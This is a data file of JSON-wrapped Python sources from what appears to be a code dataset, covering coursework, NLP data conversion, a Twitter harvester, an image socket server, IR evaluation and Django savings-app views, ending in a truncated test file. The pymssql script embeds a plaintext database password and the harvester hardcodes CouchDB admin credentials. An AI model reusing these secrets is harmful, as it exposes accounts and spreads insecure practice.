+{"seq_id":"189295043","text":"#Q1:-\r\nfile=open(\"myfile.txt\",\"r\")\r\nprint(file)\r\nfor line in reversed(list(open(\"myfile.txt\"))):\r\n print(line.rstrip())\r\nprint(file.readlines())\r\nn=int(input(\"enter lines to be read:- \"))\r\nfile=open('myfile.txt')\r\nlines=file.readlines()\r\nprint(lines[0:n-1])\r\n\r\n\r\n#Q2:-\r\nimport re\r\nimport string\r\n\r\nfrequency = {}\r\ndocument_text = open('myfile.txt', 'r')\r\ntext_string = document_text.read().lower()\r\nmatch_pattern = re.findall(r'\\b[a-z]{3,15}\\b', text_string)\r\n\r\nfor word in match_pattern:\r\n count = frequency.get(word, 0)\r\n frequency[word] = count + 1\r\n\r\nfrequency_list = frequency.keys()\r\n\r\nfor words in frequency_list:\r\n print(words, frequency[words])\r\n\r\n\r\n#Q3:-\r\nwith open(\"file1.txt\",\"w\") as f:\r\n with open(\"file2.txt\", \"r\") as f1:\r\n for line in f1:\r\n f.write(line)\r\n\r\n\r\n#Q4:-\r\nwith open('abc.txt','r') as fh1, open('def.txt','r') as fh2:\r\n for line1,line2 in zip(fh1,fh2):\r\n line1=line1[:3]\r\n line2=line2[:3]\r\n file3 = open(\"ghi.txt\", \"a\")\r\n file3.write(line1+line2+\"\\n\")\r\n file3.close()\r\n file4 = open(\"ghi.txt\", \"r\")\r\n print(file4.readlines())\r\n file4.close()\r\n\r\n\r\n#Q5:-\r\nimport random\r\nl=[]\r\nwith open(\"randomno1.txt.py\",\"a+\",encoding=\"utf-8\") as gh1, open(\"randomno2.txt.py\",\"a+\",encoding=\"utf8\") as gh2:\r\n for i in range(0,9):\r\n l.append(random.randint(0,9))\r\n for i in l:\r\n gh1.writelines(str(i))\r\n l.sort()\r\n print(l)\r\n for k in l:\r\n gh2.write(str(l)+\"\\n\")\r\n print(gh2.read)\r\n","sub_path":"Assignment14.py","file_name":"Assignment14.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"322124355","text":"#!/usr/bin/env python3\n# Copyright 2019, Nihon Unisys, Ltd.\n#\n# This source code is licensed under the BSD license.\n\nimport argparse\nimport json\nimport util\nimport re\nfrom pathlib import Path\n\nstart_pattern = re.compile(r'^\\s+\\s*')\nend_pattern = re.compile(r'^.*
    .*')\nhtmltag_pattern = re.compile(r'||<[^>]+?>')\nexcept_nextline_pattern = re.compile(r'^[^\\n]*')\n\ndef replace_html_tag(html_data):\n is_content = False\n is_comment = False\n in_table_tag = False\n content = []\n for line in html_data.split('\\n'):\n if not is_content and start_pattern.match(line):\n is_content = True\n if is_content and end_pattern.match(line):\n break\n if is_content and not is_comment and line.startswith('' in line:\n is_comment = True\n\n if not is_content or is_comment:\n iterator = except_nextline_pattern.finditer(line)\n line = list(line)\n for match in iterator:\n line[match.start():match.end()] = [' ']*(match.end()-match.start())\n content.append(''.join(line)+'\\n')\n else:\n iterator = htmltag_pattern.finditer(line)\n line = list(line)\n for match in iterator:\n if match.group().startswith('' in line:\n is_comment = False\n\n return ''.join(content)\n\ndef process(dataset, filedir, multiple_answer=False, addtitle=True):\n\n data_size = len(dataset['entry'])\n squad_data = []\n\n for i, entry in enumerate(dataset['entry']):\n\n ENE = entry['ENE']\n title = entry['title']\n page_id = entry['page_id']\n attributes = entry['Attributes_html']\n\n print('-'*5, str(i) + '/' + str(data_size), str(page_id), title, '-'*5)\n\n with filedir.joinpath(str(page_id)+'.html').open() as f:\n html_content = f.read()\n\n content = replace_html_tag(html_content)\n\n if not multiple_answer:\n content = 'φ'+content[1:]\n\n q_idx = 0\n qas = []\n\n for k,v in attributes.items():\n if addtitle:\n q = title + 'の' + k + 'は?'\n else:\n q = k\n q_idx += 1\n q_id = str(page_id) + '_' + str(q_idx)\n answers = []\n found_answers = set()\n for ans in v:\n answers.append({\"answer_start\": ans['start'], \"answer_end\": ans['end'], \"text\": ans['text']})\n\n if not multiple_answer and len(answers) == 0:\n answers.append({\"answer_start\": 0, \"text\": 'φ'})\n qas.append({\"answers\": answers, \"question\": q, \"id\": q_id})\n\n squad_json = {\"title\": title, 'WikipediaID': page_id, \"ENE\":ENE, \"paragraphs\": [{\"context\": content, \"qas\": qas}]}\n squad_data.append(squad_json)\n return squad_data\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.register('type', 'bool', util.str2bool)\n parser.add_argument('input', type=str)\n parser.add_argument('output', type=str)\n parser.add_argument('--category', type=str, default='',\n help='category name')\n parser.add_argument('--html_dir', type=str, default='./data/JP-5/HTML/',\n help='HTML data directory path')\n parser.add_argument('--multiple-answer', action='store_true',\n help='convert for multiple answers model')\n parser.add_argument('--addtitle', type='bool', default=True,\n help='add title to question string')\n parser.add_argument('--split_dev', type=float, default=0.85,\n help='start point of dev data')\n parser.add_argument('--split_test', type=float, default=0.90,\n help='start point of test data')\n\n args = parser.parse_args()\n\n if not args.category:\n p = Path(inputfile)\n args.category = p.stem.replace('_dist_2018','')\n\n squad_data_all = []\n squad_json_train = []\n squad_json_dev = []\n squad_json_test = []\n for inputfile in args.input.split(','):\n with open(inputfile) as f:\n shinra_dataset = json.load(f)\n filedir=Path(args.html_dir).joinpath(args.category)\n squad_data = process(shinra_dataset, filedir, multiple_answer=args.multiple_answer, addtitle=args.addtitle)\n\n squad_data_all.extend(squad_data)\n split_dataset = util.make_split_data(squad_data, split_nums=[args.split_dev, args.split_test])\n squad_json_train.extend(split_dataset[0])\n squad_json_dev.extend(split_dataset[1])\n squad_json_test.extend(split_dataset[2])\n\n with open(args.output, 'w') as f:\n f.write(json.dumps({\"data\": squad_data_all}, sort_keys=True, ensure_ascii=False)) #for formal run\n\n with open(args.output.replace('.json', '-train.json'), 'w') as f:\n f.write(json.dumps({\"data\": squad_json_train}, sort_keys=True, ensure_ascii=False))\n\n with open(args.output.replace('.json', '-dev.json'), 'w') as f:\n f.write(json.dumps({\"data\": squad_json_dev}, sort_keys=True, ensure_ascii=False))\n\n with open(args.output.replace('.json', '-test.json'), 'w') as f:\n f.write(json.dumps({\"data\": squad_json_test}, sort_keys=True, ensure_ascii=False))\n\nmain()\n","sub_path":"scripts/shinra/shinra_to_squad.py","file_name":"shinra_to_squad.py","file_ext":"py","file_size_in_byte":5959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"614250432","text":"\"\"\"\nCOMP90024 2021 S1 Assignment 2\nTeam: 41\nCity: Melbourne\nGroup Member:\nHuimin Huang 1142020\nHan Sun 1111271\nJean Ma 1028582\nShirui Cheng 1189721\nXiaoyue Lyu 1237539\n\"\"\"\nfrom tweepy import OAuthHandler, Stream, StreamListener\nimport twitterCredential, time, json, couchdb\nfrom urllib3.exceptions import ProtocolError\nfrom http.client import IncompleteRead as http_incompleteRead\nfrom urllib3.exceptions import IncompleteRead as urllib3_incompleteRead\n\nmonth_list = [\"\",\"Jan\",\"Feb\",\"Mar\",\"Apr\",\"May\",\"Jun\",\"Jul\",\"Aug\",\"Sep\",\"Oct\",\"Nov\",\"Dec\"]\ncity_list = [\"Melbourne\", \"Brisbane\", \"Sydney\", \"Adelaide\", \"Canberra\", \"Perth (WA)\", \"Hobart\", \"Queensland\"]\n\ndef read_score():\n with open(\"AFINN.txt\") as f:\n lines = f.readlines()\n afinn = {}\n for line in lines:\n line = line.strip().lower()\n line_len = len(line)\n try:\n score = int(line[line_len - 2: line_len].lstrip())\n word = line[0:line_len - 2].rstrip()\n afinn[word] = score*abs(score)\n except ValueError:\n print(\"invalid score\")\n f.close()\n return afinn\n\nafinn = read_score()\n\ndef processData(data):\n data = json.loads(data)\n data_dict = {\"id\": data[\"id\"]}\n\n date = data[\"created_at\"].split()\n m = month_list.index(date[1])\n month = \"0\" + str(m) if m < 10 else str(m)\n d = int(date[2])\n day = \"0\" + str(d) if d < 10 else str(d)\n year = date[-1]\n timestamp = year + \"/\" + month + \"/\" + day\n data_dict[\"created_at\"] = timestamp\n\n if data[\"place\"] is not None:\n try:\n city = data[\"place\"][\"name\"]\n if city in city_list:\n data_dict[\"metropolitan\"] = True\n else:\n data_dict[\"metropolitan\"] = False\n data_dict[\"city\"] = city\n except KeyError:\n data_dict[\"city\"] = None\n try:\n coordinates = data[\"place\"][\"bounding_box\"][\"coordinates\"][0]\n data_dict[\"coordinates\"] = [(coordinates[0][0] + coordinates[1][0]) / 2.0,\n (coordinates[0][1] + coordinates[2][1]) / 2.0]\n except KeyError:\n data_dict[\"coordinates\"] = None\n\n \"\"\"clean data to calculate sentiment score\"\"\"\n rawText = data[\"text\"]\n data_dict[\"text\"] = rawText\n # data_dict[\"text\"] = re.sub(\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \"\", rawText)\n # print(data_dict[\"text\"])\n twitter_text = data_dict[\"text\"].lower()\n replaced_twitter_text = twitter_text.replace('!', ' ').replace(',', ' ') \\\n .replace('?', ' ').replace('.', ' ').replace('\\\\\\'', ' ').replace('\\\\\\\"', ' ') \\\n .replace('\\'', ' ').replace('\\\"', ' ').replace('\\\\n', ' ')\n\n split_words = replaced_twitter_text.split()\n totalScore = 0\n for word in split_words:\n score = afinn.get(word, 0)\n totalScore += score\n data_dict[\"sentiment_score\"] = totalScore\n\n vaccine_list = [[\"astrazeneca\", \"oxford\"], [\"biontech\", \"fosun\", \"pfizer\"], [\"moderna\"], [\"johnson\"],\n [\"chinese\", \"sinovac\"], [\"sputnik\"]]\n brand = \"\"\n for type in vaccine_list:\n for vac in type:\n if vac in twitter_text:\n brand = vac\n break\n if brand != \"\":\n break\n\n data_dict[\"vaccine_brand\"] = brand\n return data_dict\n\nclass StdOutListener(StreamListener):\n \"\"\" A listener handles tweets that are received from the stream.\n This is a basic listener that just prints received tweets to stdout.\n \"\"\"\n\n def on_data(self, data):\n try:\n processedData = processData(data)\n if processedData[\"vaccine_brand\"] != \"\":\n print(\"get one tweet\")\n couch = couchdb.Server(\"http://admin:couchdb@localhost:5984\")\n db = couch['brand']\n if str(processedData[\"id\"]) not in db:\n \tdb[str(processedData[\"id\"])] = processedData\n\n except http_incompleteRead as e:\n print(\"http incompleteRead error: %s\" % str(e))\n print(\"Restart in 10 seconds\")\n time.sleep(10)\n return True\n except urllib3_incompleteRead as e:\n print(\"urllib3 IncompleteRead error: %s\" % str(e))\n print(\"Restart in 10 seconds\")\n time.sleep(10)\n return True\n except BaseException as e:\n print(\"Error: %s\" % str(e))\n print(\"Restart in 10 seconds\")\n time.sleep(10)\n return True\n return True\n\n def on_error(self, status):\n if status == 420:\n # return false in on_data disconnects the stream\n return False\n print(status)\n\n\n\nif __name__ == '__main__':\n listener = StdOutListener()\n auth = OAuthHandler(twitterCredential.consumer_key, twitterCredential.consumer_secret)\n auth.set_access_token(twitterCredential.access_token, twitterCredential.access_token_secret)\n\n stream = Stream(auth, listener)\n\n # filter stream data by the keywords:\n while True:\n try:\n #stream api filter not allow to filter by location and keyword at the same time\n stream.filter(locations=[113.338953078, -43.6345972634, 153.569469029, -10.6681857235])\n except (ProtocolError, AttributeError):\n continue\n\n","sub_path":"Harvester/StreamCrawler_b.py","file_name":"StreamCrawler_b.py","file_ext":"py","file_size_in_byte":5341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"528553858","text":"import logging\nimport os\nimport socket\nimport struct\n\nimport cv2\n\n_ip = 'localhost'\n_port = 7007\n\n_image_paths = [\n 'data/android.jpg',\n 'data/android_flip.jpg',\n]\n\n_logger = logging.getLogger(__name__)\n\n\nclass ImageServer:\n\n def __init__(self):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server_socket:\n _logger.debug('Server socket created')\n\n server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server_socket.bind((_ip, _port))\n server_socket.listen(1)\n\n image_index = 0\n\n while True:\n _logger.debug('Server socket waiting for incoming connections')\n\n client_socket, from_address = server_socket.accept()\n with client_socket:\n _logger.debug('Connection established with {}'.format(from_address))\n\n image_path = os.path.join(os.getcwd(), _image_paths[image_index])\n img = cv2.imread(image_path, cv2.IMREAD_COLOR)\n\n # img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n # img = cv2.resize(img, dsize=(10, 10))\n _ret, img = cv2.imencode('.jpg', img)\n\n img_bytes = img.tobytes()\n data = struct.pack('>I', len(img_bytes)) + img_bytes\n\n try:\n client_socket.sendall(data)\n _logger.debug('Sent {} bytes to {}'.format(len(data), from_address))\n except ConnectionResetError as conn_reset_err:\n _logger.exception(conn_reset_err)\n\n _logger.debug('Closing connection with {}'.format(from_address))\n\n image_index = (image_index + 1) % len(_image_paths)\n\n # _logger.debug('Closing server socket')\n\n # print('Bye!')\n\n\ndef main():\n ImageServer()\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n main()\n","sub_path":"test/image_server.py","file_name":"image_server.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"198632932","text":"import GeneralLib as GL\nimport os\nfrom pip._vendor.distlib.compat import raw_input\n\nclass Evaluate:\n \n def __init__(self, qresultsPath):\n #Folder where results are stored\n self._qrPath = qresultsPath\n #Json file where relevance info is stored \n self._relInfo = GL.jsonToDict(raw_input(\"Enter json file where relevance info is stored:\"))\n #Precision table\n self._precTable = dict()\n #Recall Table\n self._recallTable = dict()\n #Table having average precisions for each query \n self._avgPrecisions = list()\n #Table having the reciprocal rank if first relevant document retrieved.\n self._fRecRank = list()\n self._MAP = 0\n self._MRR = 0\n self._Pat5 = 0\n self._Pat20 = 0\n \n #Evaluate results of a query \n def performEval(self):\n resultsFile = GL.getDataFiles(self._qrPath)\n evalFilesPath = raw_input(\"Enter folder where all evaluation results will be stored:\")\n if not os.path.exists(evalFilesPath):\n os.mkdir(evalFilesPath)\n \n #For each query, get the results\n for file in resultsFile:\n qID = GL.getQID(file)\n\n #If query not in relvance info, discard the query\n if not qID in self._relInfo.keys():\n continue\n filename = GL.getFilename(self._qrPath, file)\n results = GL.getResults(filename)\n folderName = evalFilesPath + \"Eval_Query\" + str(qID) +\"/\"\n \n \n #Calculate precision and store precision table \n self._precTable = self.calcPrecision(results, qID)\n data = \"\"\n if (len(self._precTable.keys()) > 1):\n if not os.path.exists(folderName):\n os.mkdir(folderName)\n for entry in self._precTable.keys():\n data += entry + \"\\t\" + str(self._precTable[entry]) + \"\\n\" \n with open(GL.getFilename(folderName, \"PrecisonTable.txt\"), 'w') as f:\n f.write(data)\n \n #Calculate P@5 and P@20 \n self._Pat5 = self.calcPatK(5)\n self._Pat20 = self.calcPatK(20)\n data = \"\\nPrecision @ 5 :\" + str(self._Pat5)\n data += \"\\nPrecision @ 20 :\" + str(self._Pat20)\n with open(GL.getFilename(folderName, \"Precision@K.txt\"), 'w') as f:\n f.write(data)\n \n #Calulate average precisions\n self._avgPrecisions.append(self.calcAvgPrecision(qID, results))\n \n #Calculate precision and store precision table \n self._recallTable = self.calcRecall(results, qID)\n data = \"\"\n if (len(self._recallTable.keys()) > 1):\n if not os.path.exists(folderName):\n os.mkdir(folderName)\n for entry in self._recallTable.keys():\n data += entry + \"\\t\" + str(self._recallTable[entry]) + \"\\n\" \n with open(GL.getFilename(folderName, \"RecallTable.txt\"), 'w') as f:\n f.write(data)\n \n print(\"Done with evaluating Query\" + str(qID) + \".\")\n \n self._MAP = self.calcMAP()\n print(self._MAP)\n self._MRR = self.calcMRR()\n data = \"Mean Average Precision : \" + str(self._MAP)\n data += \"\\nMean Reciprocal Rank : \" + str(self._MRR)\n \n with open(GL.getFilename(evalFilesPath, \"MAP_MRR.txt\"), 'w') as f:\n f.write(data)\n print(\"Done with evaluation.\") \n \n #Function to calculate precision\n def calcPrecision(self, results, qID):\n pTable = dict()\n N = 0\n D = 0\n \n for rank in results.keys():\n if (results[rank] in self._relInfo[qID]):\n N+=1\n if(N==1):\n self._fRecRank.append(1 / rank)\n D+=1\n pTable.update({results[rank] : (N / D)})\n return pTable\n \n #Function to calculate recall\n def calcRecall(self, results, qID):\n rTable = dict()\n N = 0\n D = len(self._relInfo[qID])\n \n for rank in results.keys():\n if (results[rank] in self._relInfo[qID]):\n N+=1\n rTable.update({results[rank] : (N / D)})\n return rTable\n\n \n #Function to calculate Average precision\n def calcAvgPrecision(self, qID, results):\n totalPrecision = 0\n for entry in self._relInfo[qID]:\n if entry in results.values():\n totalPrecision += self._precTable[entry]\n \n return (totalPrecision / len(self._relInfo[qID]))\n \n \n #Function to calculate MAP\n def calcMAP(self):\n totalPrecision = 0\n for prec in self._avgPrecisions:\n totalPrecision += prec\n\n return (totalPrecision / len(self._avgPrecisions))\n \n \n #Function to calculate MRR\n def calcMRR(self):\n totalRecRank = 0\n for rrank in self._fRecRank:\n totalRecRank += rrank\n \n return (totalRecRank / len(self._fRecRank))\n \n \n #Function to calculate precision at K\n def calcPatK(self, K):\n rank = 1\n for doc in self._precTable.keys():\n if rank==K:\n return self._precTable[doc]\n rank+=1\n \n return 0\n \nif __name__ == \"__main__\" :\n \n resultsFolder = raw_input(\"Enter folder where search results are stored:\")\n evaluate = Evaluate(resultsFolder)\n evaluate.performEval()","sub_path":"Phase2/src/Evaluation.py","file_name":"Evaluation.py","file_ext":"py","file_size_in_byte":5654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"430587583","text":"import pymorphy2\nimport numpy as np\nimport pymssql\nimport re\nimport scipy\nfrom sklearn.feature_extraction.text import HashingVectorizer\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score, roc_auc_score\nfrom sklearn.decomposition import PCA\n\ndata = []\n\ndef f_tokenizer(s):\n morph = pymorphy2.MorphAnalyzer()\n if type(s) == unicode:\n t = s.split(' ')\n else:\n t = s\n for j in t:\n m = morph.parse(j.replace('.',''))\n if not len(m) == 0:\n wrd = m[0]\n if wrd.tag.POS not in ('NUMR','PREP','CONJ','PRCL','INTJ'):\n data.append(wrd.normal_form)\n return data\n\nconn = pymssql.connect(server='RIY-PC\\SQLRIY', user='EPLANASU\\RIY', password='Butcherryb76593', database='Price_python')\n\ncursor = conn.cursor(as_dict=True)\n\ncursor.execute(\"SELECT TOP 500 name FROM dbo.Price_list\")\n\nfor row in cursor:\n row = str(row['name']).lower()\n row = re.sub(r'устр(-во|\\.)','устройство', row)\n row = re.sub(r'авт(омат\\.|ом\\.|\\.)','автоматического', row)\n row = re.sub(r'рег(ул\\.|улир\\.|\\-я)','регулирования', row)\n row = row.replace('ас.','асинхронный ')\n row = row.replace('пост.тока','постоянного тока')\n row = row.replace('перем.тока','переменного тока')\n row = row.replace('прям.вкл.','прямого включения')\n row = row.replace('модул.','модульный')\n row = row.replace('тороид.','торроидный ')\n row = row.lstrip()\n row = row.rstrip()\n print(row)\n coder = HashingVectorizer(tokenizer=f_tokenizer, encoding='KOI8-R', n_features=256)\nconn.commit()\n\nprint(data)","sub_path":"machine.py","file_name":"machine.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"104520088","text":"from django.shortcuts import render\nfrom pymongo import MongoClient\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom django.http.request import QueryDict\nimport json\nimport os\nimport pandas as pd\nfrom django.conf import settings\nimport pdb\n\ndef choice_without_id(request):\n\n request.GET = request.GET.copy()\n request.GET.update({'user_id': 1234, 'name': 'Max', 'intervention': 1})\n return choice(request, alert=\"\"\"alert(\\\"You shouldn\\'t be here.\\\")\"\"\")\n\ndef choice(request, alert=\"\"):\n # return render(request, 'saving_app/voya-choices.html', {'user_id': user_id})\n try:\n user_id = request.GET.get(\"user_id\")\n name = request.GET.get(\"name\")\n intervention = int(request.GET.get(\"intervention\"))\n except:\n return HttpResponseNotFound(\"

    Please specify correct paramters. These are user_id, name and intervention.

    \")\n if (intervention == 1):\n chooseText = (\"I want to enroll with other choices.\", \"Note: This enrollment will cancel your scheduled automatic enrollment.\")\n defaultText = (\"Let my scheduled automatic enrollment go through.\", \"\")\n optoutText = (\"I do not wish to enroll.\", \"\")\n elif (intervention == 2):\n chooseText = (\"Do it Myself\", \"I want to enroll with other choices\")\n defaultText = (\"Do it for Me\", \"Let my scheduled auto-enrollment go through\")\n optoutText = (\"I Don't Want to Save\", \"I want to cancel my auto-enrollment\")\n elif (intervention >= 3 and intervention <= 17):\n chooseText = (\"I want to enroll at a different rate.\", \"I want to personalize my enrollment by selecting a different savings rate.\")\n defaultText = (\"I want to confirm my automatic enrollment.\", \"I want my auto-enrollment to go through at the savings rate chosen by my employer.\")\n optoutText = (\"I do not want to enroll.\", \"I want to cancel my auto-enrollment and not save at this time.\")\n else:\n return HttpResponseNotFound(\"

    Currently only support intervention from 1 to 17.

    \")\n\n # Extra text\n if (intervention >= 14):\n extraText = \"\"\n else:\n extraText = \"hidden\"\n\n # Orientation\n if (intervention in [9, 10]):\n grid = \"col-sm-4 col-sm-offset-4 top-buffer\"\n zeroMargin = \"margin-top:0; margin-bottom: 4px; min-height: 0; padding-top: 0; padding-bottom: 0;\"\n realZeroMargin = \"margin-top:0; margin-bottom: 0; min-height: 0; padding-top: 0; padding-bottom: 0;\"\n zeroMinheight = \"min-height: 0;\"\n else:\n grid = \"col-sm-4\"\n zeroMargin = \"\"\n realZeroMargin = \"\"\n zeroMinheight = \"\"\n\n chooseAttr = \"id=others\"\n defaultAttr = \"\"\"id=\"auto\" onclick=\"$('#myModal2').modal({backdrop:'static'}, 'toggle');\" \"\"\"\n optoutAttr = \"\"\"id=\"no\" onclick=\"$('#myModal').modal({backdrop:'static'}, 'toggle');\" \"\"\"\n optionsAttr = [None]*3\n optionsText = [None]*3\n # Option position and text\n if (intervention in [1,2,3,10,11,12,13,14,15,16,17]):\n optionsAttr = [chooseAttr, defaultAttr, optoutAttr]\n optionsText = [chooseText, defaultText, optoutText]\n elif (intervention in [4, 9]):\n optionsAttr = [defaultAttr, chooseAttr, optoutAttr]\n optionsText = [defaultText, chooseText, optoutText]\n elif (intervention in [5]):\n optionsAttr = [defaultAttr, optoutAttr, chooseAttr]\n optionsText = [defaultText, optoutText, chooseText]\n elif (intervention in [6]):\n optionsAttr = [chooseAttr, optoutAttr, defaultAttr]\n optionsText = [chooseText, optoutText, defaultText]\n elif (intervention in [7]):\n optionsAttr = [optoutAttr, chooseAttr, defaultAttr]\n optionsText = [optoutText, chooseText, defaultText]\n elif (intervention in [8]):\n optionsAttr = [optoutAttr, defaultAttr, chooseAttr]\n optionsText = [optoutText, defaultText, chooseText]\n\n # Option colors\n color = [\"\"]*3\n if (intervention in [11, 15]):\n color = [\"\", \"\", \"red\"]\n elif (intervention in [12, 16]):\n color = [\"green\", \"yellow\", \"red\"]\n elif (intervention in [13, 17]):\n color = [\"yellow\", \"green\", \"red\"]\n\n return render(request, 'saving_app/voya-choices.html',\n {\"user_id\": user_id, \"name\": name, \"optionsText\": optionsText,\n \"intervention\": intervention, \"extraText\": extraText,\n \"grid\": grid, \"optionsAttr\": optionsAttr, \"color\": color, \"alert\": alert,\n \"zeroMargin\": zeroMargin, \"zeroMinheight\": zeroMinheight,\n \"realZeroMargin\" :realZeroMargin})\n\ndef set1(request):\n # return render(request, 'saving_app/voya-choices.html', {'user_id': user_id})\n user_id = request.GET.get(\"user_id\")\n name = request.GET.get(\"name\")\n intervention = int(request.GET.get(\"intervention\"))\n return render(request, 'saving_app/voya-set1.html',\n {\"user_id\": user_id, \"name\": name, \"intervention\": intervention})\n\ndef set2(request):\n user_id = request.GET.get(\"user_id\")\n name = request.GET.get(\"name\")\n contri = request.GET.get(\"contri\")\n age = request.GET.get(\"age\")\n salary = request.GET.get(\"salary\")\n savings = request.GET.get(\"savings\")\n intervention = int(request.GET.get(\"intervention\"))\n if (contri == None):\n contri = -1\n return render(request, 'saving_app/voya-set2.html',\n {\"user_id\": user_id, \"name\": name, \"contri\": contri,\n \"age\": age, \"salary\": salary, \"savings\": savings, \"intervention\": intervention})\n\ndef lookup(request):\n age = int(request.GET.get(\"age\"))\n salary = int(request.GET.get(\"salary\"))\n savings = int(request.GET.get(\"savings\"))\n csv_file = os.path.join(settings.BASE_DIR, \"saving_app/lookup.csv\")\n lk = pd.read_csv(csv_file)\n # The largest element which is smaller than the query\n uni_ages = lk.Age.unique()\n age_thre = uni_ages[age >= uni_ages]\n if (len(age_thre) == 0):\n uni_ages.sort()\n age_thre = uni_ages[0]\n else:\n age_thre.sort()\n age_thre = age_thre[-1]\n # The largest element which is smaller than the query\n uni_salaries = lk.Salary.unique()\n salary_thre = uni_salaries[salary >= uni_salaries]\n if (len(salary_thre) == 0):\n uni_salaries.sort()\n salary_thre = uni_salaries[0]\n else:\n salary_thre.sort()\n salary_thre = salary_thre[-1]\n # The largest element which is smaller than the query\n uni_savings = lk.Savings.unique()\n savings_thre = uni_savings[savings >= uni_savings]\n if (len(savings_thre) == 0):\n uni_savings.sort()\n savings_thre = uni_savings[0]\n else:\n savings_thre.sort()\n savings_thre = savings_thre[-1]\n small_lk = lk[(lk['Age'] == age_thre) & (lk['Salary'] == salary_thre) & (lk['Savings'] == savings_thre)]\n lk_dict = {}\n for row in small_lk.iterrows():\n lk_dict[row[1]['Rate']] = {}\n lk_dict[row[1]['Rate']]['target'] = row[1]['Target']\n lk_dict[row[1]['Rate']]['need'] = row[1]['Need']\n lk_dict[row[1]['Rate']]['gap'] = row[1]['Gap']\n\n data = json.dumps(lk_dict)\n return HttpResponse(data, content_type='application/json')\n\n\n\n\ndef set3(request):\n user_id = request.GET.get(\"user_id\")\n name = request.GET.get(\"name\")\n contri = request.GET.get(\"contri\")\n age = request.GET.get(\"age\")\n salary = request.GET.get(\"salary\")\n savings = request.GET.get(\"savings\")\n intervention = int(request.GET.get(\"intervention\"))\n return render(request, 'saving_app/voya-set3.html',\n {\"user_id\": user_id, \"name\": name, \"contri\": contri,\n \"age\": age, \"salary\": salary, \"savings\": savings, \"intervention\": intervention})\n\ndef update(request):\n user_id = request.GET.get(\"user_id\")\n name = request.GET.get(\"name\")\n client = MongoClient()\n\n client = MongoClient(os.environ['MONGOLAB_OLIVE_URI'])\n\n db = client.get_default_database()\n cursor = db.user_data.find_one({\"user_id\": user_id})\n if (cursor == None):\n db.user_data.insert_one({\n \"name\": name,\n \"user_id\": user_id,\n \"choice_time\": 0,\n \"set1_time\": 0,\n \"set2_time\": 0,\n \"set3_time\": 0,\n \"clicks\": []\n })\n\n clicks = request.GET.get(\"clicks\")\n if (clicks != None):\n db.user_data.update_one(\n {\"user_id\": user_id}, {\n \"$push\": {\n \"clicks\": clicks\n }\n }\n )\n\n choice_time = request.GET.get(\"choice_time\")\n if (choice_time != None):\n db.user_data.update_one(\n {\"user_id\": user_id}, {\n \"$inc\": {\n \"choice_time\": float(choice_time)\n }\n }\n )\n\n set1_time = request.GET.get(\"set1_time\")\n if (set1_time != None):\n db.user_data.update_one(\n {\"user_id\": user_id}, {\n \"$inc\": {\n \"set1_time\": float(set1_time)\n }\n }\n )\n\n set2_time = request.GET.get(\"set2_time\")\n if (set2_time != None):\n db.user_data.update_one(\n {\"user_id\": user_id}, {\n \"$inc\": {\n \"set2_time\": float(set2_time)\n }\n }\n )\n\n set3_time = request.GET.get(\"set3_time\")\n if (set3_time != None):\n db.user_data.update_one(\n {\"user_id\": user_id}, {\n \"$inc\": {\n \"set3_time\": float(set3_time)\n }\n }\n )\n\n rate = request.GET.get(\"rate\")\n if (rate != None):\n db.user_data.update_one(\n {\"user_id\": user_id}, {\n \"$set\": {\n \"rate\": int(float(rate))\n }\n }\n )\n\n final_choice = request.GET.get(\"final_choice\")\n if (final_choice != None):\n db.user_data.update_one(\n {\"user_id\": user_id}, {\n \"$set\": {\n \"final_choice\": final_choice\n }\n }\n )\n\n intervention = request.GET.get(\"intervention\")\n if (intervention != None):\n db.user_data.update_one(\n {\"user_id\": user_id}, {\n \"$set\": {\n \"intervention\": intervention\n }\n }\n )\n\n client.close()\n\n return HttpResponse('')\n","sub_path":"saving_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"220228469","text":"import unittest\nimport sys\nimport datetime\n\nsys.path.append('../')\n\nfrom etl.Loaders.DedupeOnlyLoader import DedupeOnlyLoader\nfrom tests.utils.TestDBInterface import get_test_interface\n\n\nclass TestDedupeOnlyLoader(unittest.TestCase):\n\n def setUp(self):\n self.TEST_TABLE = 'test_table'\n self.SEED_TEST_DATA = [{'ID': 1, 'first_name': 'Henry', 'last_name': 'Jones', 'school_year': 'Sophomore',\n 'updated_at': datetime.datetime(2017, 3, 12, 15, 45, 0)},\n {'ID': 2, 'first_name': 'Hiroshi', 'last_name': 'Tanaka', 'school_year': 'Senior',\n 'updated_at': datetime.datetime(2017, 6, 15, 8, 15, 32)},\n {'ID': 3, 'first_name': 'Ifemelu', 'last_name': 'Ngozi', 'school_year': 'Senior',\n 'updated_at': datetime.datetime(2017, 4, 25, 19, 11, 14)},\n {'ID': 4, 'first_name': 'Jimmy', 'last_name': 'Hoffa', 'school_year': 'Masters',\n 'updated_at': datetime.datetime(2017, 1, 22, 11, 45, 12)}]\n\n self.TEST_MATCH_FILEDS = ['first_name', 'updated_at']\n\n self.NO_DUP_FIELDS = {'first_name': 'Hiram', 'last_name': 'Jallop', 'school_year': 'Masters',\n 'updated_at': datetime.datetime(2017, 4, 1, 12, 0, 25)}\n self.SAME_FIRST_NAME = {'first_name': 